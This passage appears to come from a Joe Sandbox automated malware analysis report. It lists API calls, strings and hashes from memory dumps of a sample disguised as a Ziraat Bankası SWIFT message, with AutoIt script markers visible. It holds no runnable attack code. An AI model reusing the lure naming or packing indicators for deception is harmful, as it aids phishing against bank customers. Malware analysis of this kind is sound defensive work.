                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1996641542-0
                                                                                                                                                        • Opcode ID: b0cb09813e5db9aa674625aab9cb5e2e370f201121cd5c8adb68d3801b948b72
                                                                                                                                                        • Instruction ID: 37274854d8c46cbcdfe1b5f98dd50f766fd1fd5cc9bb90d0fee42482fa8b6530
                                                                                                                                                        • Opcode Fuzzy Hash: b0cb09813e5db9aa674625aab9cb5e2e370f201121cd5c8adb68d3801b948b72
                                                                                                                                                        • Instruction Fuzzy Hash: 66513072900208BFDF109FA5EC48EAE7BB9FF48324F114515FA55AB2A1DBB19A40DF50
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000EB7B0
                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000EB7C1
                                                                                                                                                        • CharNextW.USER32(0000014E), ref: 000EB7F0
                                                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000EB831
                                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000EB847
                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000EB858
                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 000EB875
                                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 000EB8C7
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 000EB8DD
                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 000EB90E
                                                                                                                                                        • _memset.LIBCMT ref: 000EB933
                                                                                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 000EB97C
                                                                                                                                                        • _memset.LIBCMT ref: 000EB9DB
                                                                                                                                                        • SendMessageW.USER32 ref: 000EBA05
                                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 000EBA5D
                                                                                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 000EBB0A
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 000EBB2C
                                                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 000EBB76
                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000EBBA3
                                                                                                                                                        • DrawMenuBar.USER32(?), ref: 000EBBB2
                                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 000EBBDA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 1073566785-4108050209
                                                                                                                                                        • Opcode ID: 70771794cf22d342f4d97facf1ea1e16b1a7501aec577bca1f27bba163066e06
                                                                                                                                                        • Instruction ID: b5a507d26c3d42495bce963eca520ee25ca1fb1973b72fa8438a3b39985f9306
                                                                                                                                                        • Opcode Fuzzy Hash: 70771794cf22d342f4d97facf1ea1e16b1a7501aec577bca1f27bba163066e06
                                                                                                                                                        • Instruction Fuzzy Hash: CDE17F75900258AFDB209FA6DC84AFF7BB8FF05710F108156F959BA191DBB08A81DF60
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 000C6CFB
                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 000C6D21
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000C6D4F
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000C6D5A
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C6D70
                                                                                                                                                        • _wcsstr.LIBCMT ref: 000C6D7B
                                                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 000C6D97
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C6DE0
                                                                                                                                                        • _wcscat.LIBCMT ref: 000C6DE7
                                                                                                                                                        • _wcsncpy.LIBCMT ref: 000C6E12
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                        • API String ID: 699586101-1459072770
                                                                                                                                                        • Opcode ID: 721d23592c33f031b3a86fa9403925578d2cd82693498db69263d44391419af7
                                                                                                                                                        • Instruction ID: d1f9240faf125786e36f995e712c571a0eae90203dfe3147409e4c6a175f7599
                                                                                                                                                        • Opcode Fuzzy Hash: 721d23592c33f031b3a86fa9403925578d2cd82693498db69263d44391419af7
                                                                                                                                                        • Instruction Fuzzy Hash: 2341D672A00205BBEB10ABA4DC47FFF77BCDF46710F044069F901E2183EB759A0196A6
                                                                                                                                                        APIs
                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009A939
                                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 0009A941
                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009A96C
                                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 0009A974
                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0009A999
                                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0009A9B6
                                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0009A9C6
                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0009A9F9
                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0009AA0D
                                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 0009AA2B
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 0009AA47
                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0009AA52
                                                                                                                                                          • Part of subcall function 0009B63C: GetCursorPos.USER32(000000FF), ref: 0009B64F
                                                                                                                                                          • Part of subcall function 0009B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0009B66C
                                                                                                                                                          • Part of subcall function 0009B63C: GetAsyncKeyState.USER32(00000001), ref: 0009B691
                                                                                                                                                          • Part of subcall function 0009B63C: GetAsyncKeyState.USER32(00000002), ref: 0009B69F
                                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,0009AB87), ref: 0009AA79
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                        • String ID: AutoIt v3 GUI
                                                                                                                                                        • API String ID: 1458621304-248962490
                                                                                                                                                        • Opcode ID: 85c7163ae83c546a80606ae974551d43cdfcc978e60c509025805c70507cb2f8
                                                                                                                                                        • Instruction ID: b98e18a2adff735103a7f13d625bb367b20594f96ca0cab3502ab0c1f4b046ff
                                                                                                                                                        • Opcode Fuzzy Hash: 85c7163ae83c546a80606ae974551d43cdfcc978e60c509025805c70507cb2f8
                                                                                                                                                        • Instruction Fuzzy Hash: 8AB1AC75A4020AAFDF14DFA8DC45BEE7BB5FB09314F114229FA15A72A0DBB0D880DB51
                                                                                                                                                        APIs
                                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 000BCF91
                                                                                                                                                        • __swprintf.LIBCMT ref: 000BD032
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000BD045
                                                                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 000BD09A
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000BD0D6
                                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 000BD10D
                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 000BD15F
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 000BD195
                                                                                                                                                        • GetParent.USER32(?), ref: 000BD1B3
                                                                                                                                                        • ScreenToClient.USER32(00000000), ref: 000BD1BA
                                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 000BD234
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000BD248
                                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 000BD26E
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000BD282
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                                        • String ID: %s%u
                                                                                                                                                        • API String ID: 3119225716-679674701
                                                                                                                                                        • Opcode ID: 808deaa4ec60ad87dcadb2b55cdf0a0893bd2e3360572fba44eb464f18d28fb8
                                                                                                                                                        • Instruction ID: c0cf12647c03b5dd7332ec76d6171d7b651e7b30d1286b51cb48a8a9271d08b7
                                                                                                                                                        • Opcode Fuzzy Hash: 808deaa4ec60ad87dcadb2b55cdf0a0893bd2e3360572fba44eb464f18d28fb8
                                                                                                                                                        • Instruction Fuzzy Hash: 7FA1CD71604746ABD714DF64C884FEAF7E8FF54314F008A2AF999D2181EB30EA45CBA1
                                                                                                                                                        APIs
                                                                                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 000BD8EB
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000BD8FC
                                                                                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 000BD924
                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 000BD941
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000BD95F
                                                                                                                                                        • _wcsstr.LIBCMT ref: 000BD970
                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 000BD9A8
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000BD9B8
                                                                                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 000BD9DF
                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 000BDA28
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000BDA38
                                                                                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 000BDA60
                                                                                                                                                        • GetWindowRect.USER32(00000004,?), ref: 000BDAC9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                        • String ID: @$ThumbnailClass
                                                                                                                                                        • API String ID: 1788623398-1539354611
                                                                                                                                                        • Opcode ID: 5ddc40ba6cb4d869896a63a552e12cdb229924d415c2de7f4917e091d709cb4b
                                                                                                                                                        • Instruction ID: 182673bacfc1d0029242ea56afc5432efafd480b6ccf5c38444ef5410cda911a
                                                                                                                                                        • Opcode Fuzzy Hash: 5ddc40ba6cb4d869896a63a552e12cdb229924d415c2de7f4917e091d709cb4b
                                                                                                                                                        • Instruction Fuzzy Hash: 77819D310083059BDB15DF60D885FEABBE8FF84714F08846AFD899A096EB74DD45CBA1
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                        • API String ID: 1038674560-1810252412
                                                                                                                                                        • Opcode ID: 65a9cc88dcecd8b51e62f3526b17e2ae6b23b47344fff615612e3ae5ca1d20f2
                                                                                                                                                        • Instruction ID: 03eab3d8ad4acae4fbebc30d919cb08206ea797a43bb4ffc6510e9f6d5029220
                                                                                                                                                        • Opcode Fuzzy Hash: 65a9cc88dcecd8b51e62f3526b17e2ae6b23b47344fff615612e3ae5ca1d20f2
                                                                                                                                                        • Instruction Fuzzy Hash: A6314F31648209AADB24FB60DE53EEDF3B5AF21755F20016AF481B10D6FF62AE04C755
                                                                                                                                                        APIs
                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 000BEAB0
                                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000BEAC2
                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 000BEAD9
                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 000BEAEE
                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 000BEAF4
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 000BEB04
                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 000BEB0A
                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000BEB2B
                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000BEB45
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 000BEB4E
                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 000BEBB9
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000BEBBF
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 000BEBC6
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 000BEC12
                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 000BEC1F
                                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 000BEC44
                                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000BEC6F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3869813825-0
                                                                                                                                                        • Opcode ID: 9b7b815c01b6895f4fcc525fb85f4c75f591b9241e30fb806664866f9a1508b1
                                                                                                                                                        • Instruction ID: c2fcff086323866fa5afd9a25aad0e017e13571e6734f0322e1818fc6be0a89a
                                                                                                                                                        • Opcode Fuzzy Hash: 9b7b815c01b6895f4fcc525fb85f4c75f591b9241e30fb806664866f9a1508b1
                                                                                                                                                        • Instruction Fuzzy Hash: 47513E71900749EFDB209FA8DD89FAFBBF5FF04704F004928E696A25A1D775A944CB10
                                                                                                                                                        APIs
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 000D79C6
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 000D79D1
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 000D79DC
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 000D79E7
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 000D79F2
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 000D79FD
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 000D7A08
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 000D7A13
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 000D7A1E
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 000D7A29
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 000D7A34
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 000D7A3F
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 000D7A4A
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 000D7A55
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 000D7A60
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 000D7A6B
                                                                                                                                                        • GetCursorInfo.USER32(?), ref: 000D7A7B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Cursor$Load$Info
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2577412497-0
                                                                                                                                                        • Opcode ID: 8d195e4a3a77a89e419754b93095c4490d3c4104876709e8ee1d9b312ab10e83
                                                                                                                                                        • Instruction ID: 6156c507456e2cb2eb53f25aefa9520e29eb99a08e742ebf2a2c1c7a1fb29fca
                                                                                                                                                        • Opcode Fuzzy Hash: 8d195e4a3a77a89e419754b93095c4490d3c4104876709e8ee1d9b312ab10e83
                                                                                                                                                        • Instruction Fuzzy Hash: 143129B0D083196ADF509FBA8C8995FBFE8FF44750F504527E50DE7280EA78A5008FA1
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0008C8B7,?,00002000), ref: 0009E984
                                                                                                                                                          • Part of subcall function 0008660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000853B1,?,?,000861FF,?,00000000,00000001,00000000), ref: 0008662F
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 0008C93E
                                                                                                                                                        • _wcscpy.LIBCMT ref: 0008C953
                                                                                                                                                        • _wcscat.LIBCMT ref: 0008C968
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0008C978
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0008CABE
                                                                                                                                                          • Part of subcall function 0008B337: _wcscpy.LIBCMT ref: 0008B36F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath_wcscat
                                                                                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                        • API String ID: 1757494288-1018226102
                                                                                                                                                        • Opcode ID: 53bebda98c7d41deb2e32921a7b444e0f5ea0303299847b0f07576c4007ea7a1
                                                                                                                                                        • Instruction ID: f4faa4b3edfbc5509379f41dce6d452fa3a72f7694b891a74a6aba095fd54877
                                                                                                                                                        • Opcode Fuzzy Hash: 53bebda98c7d41deb2e32921a7b444e0f5ea0303299847b0f07576c4007ea7a1
                                                                                                                                                        • Instruction Fuzzy Hash: 231279715083459FD724EF24C881AAFBBE4BF99314F04492EF5C993262DB30DA49DB62
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 000ECEFB
                                                                                                                                                        • DestroyWindow.USER32(?,?), ref: 000ECF73
                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000ECFF4
                                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000ED016
                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000ED025
                                                                                                                                                        • DestroyWindow.USER32(?), ref: 000ED042
                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00080000,00000000), ref: 000ED075
                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000ED094
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000ED0A9
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 000ED0B0
                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000ED0C2
                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000ED0DA
                                                                                                                                                          • Part of subcall function 0009B526: GetWindowLongW.USER32(?,000000EB), ref: 0009B537
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
